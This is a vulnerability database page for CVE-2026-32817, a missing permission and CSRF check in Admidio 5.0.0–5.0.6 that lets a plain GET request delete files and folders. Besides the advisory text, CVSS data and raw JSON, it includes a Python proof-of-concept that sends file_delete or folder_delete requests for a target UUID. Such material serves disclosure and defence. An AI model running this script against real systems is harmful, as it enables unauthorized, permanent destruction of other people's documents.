Security Vulnerability Report
中文
CVE-2026-32817 CVSS 9.1 CRITICAL

CVE-2026-32817

Published: 2026-03-20 02:16:35
Last Modified: 2026-03-23 13:16:30
Source: [email protected]

Description

Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the documents and files module does not verify whether the current user has permission to delete folders or files. The folder_delete and file_delete action handlers in modules/documents-files.php only perform a VIEW authorization check (getFolderForDownload / getFileForDownload) before calling delete(), and they never validate a CSRF token. Because the target UUIDs are read from $_GET, deletion can be triggered by a plain HTTP GET request. When the module is in public mode (documents_files_module_enabled = 1) and a folder is marked public (fol_public = true), an unauthenticated attacker can permanently destroy the entire document library. Even when the module requires login, any user with view-only access can delete content they are only permitted to read. This issue has been fixed in version 5.0.7.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio 5.0.0
Admidio 5.0.1
Admidio 5.0.2
Admidio 5.0.3
Admidio 5.0.4
Admidio 5.0.5
Admidio 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # POC for CVE-2026-32817 # Description: Delete a file/folder via plain HTTP GET request due to missing permission checks and CSRF protection. def exploit(target_url, target_uuid): # The endpoint is modules/documents-files.php # Vulnerable parameters are derived from the description (folder_delete/file_delete actions) # This example demonstrates the file_delete action full_url = f"{target_url}/modules/documents-files.php" # Parameters based on the vulnerability description params = { 'mode': 'file_delete', # or 'folder_delete' 'uuid': target_uuid # The UUID of the target file/folder } try: response = requests.get(full_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Request sent to {full_url}") print(f"[+] Status Code: {response.status_code}") print("[+] Check if the file/folder has been deleted.") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target and a valid UUID obtained via reconnaissance target = "http://example.com/admidio" uuid = "VALID_UUID_HERE" exploit(target, uuid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32817", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.380", "lastModified": "2026-03-23T13:16:30.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the documents and files module does not verify whether the current user has permission to delete folders or files. The folder_delete and file_delete action handlers in modules/documents-files.php only perform a VIEW authorization check (getFolderForDownload / getFileForDownload) before calling delete(), and they never validate a CSRF token. Because the target UUIDs are read from $_GET, deletion can be triggered by a plain HTTP GET request. When the module is in public mode (documents_files_module_enabled = 1) and a folder is marked public (fol_public = true), an unauthenticated attacker can permanently destroy the entire document library. Even when the module requires login, any user with view-only access can delete content they are only permitted to read. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. En las versiones 5.0.0 a 5.0.6, el módulo de documentos y archivos no verifica si el usuario actual tiene permiso para eliminar carpetas o archivos. Los manejadores de acciones folder_delete y file_delete en modules/documents-files.php solo realizan una verificación de autorización de VISTA (getFolderForDownload / getFileForDownload) antes de llamar a delete(), y nunca validan un token CSRF. Debido a que los UUID de destino se leen de $_GET, la eliminación puede ser activada por una solicitud HTTP GET simple. Cuando el módulo está en modo público (documents_files_module_enabled = 1) y una carpeta está marcada como pública (fol_public = true), un atacante no autenticado puede destruir permanentemente toda la biblioteca de documentos. Incluso cuando el módulo requiere inicio de sesión, cualquier usuario con acceso de solo lectura puede eliminar contenido que solo tiene permiso para leer. Este problema ha sido solucionado en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.7", "matchCriteriaId": "4020E2FE-8E51-405F-86CB-DAAFBA7FD9B3"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rmpj-3x5m-9m5f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.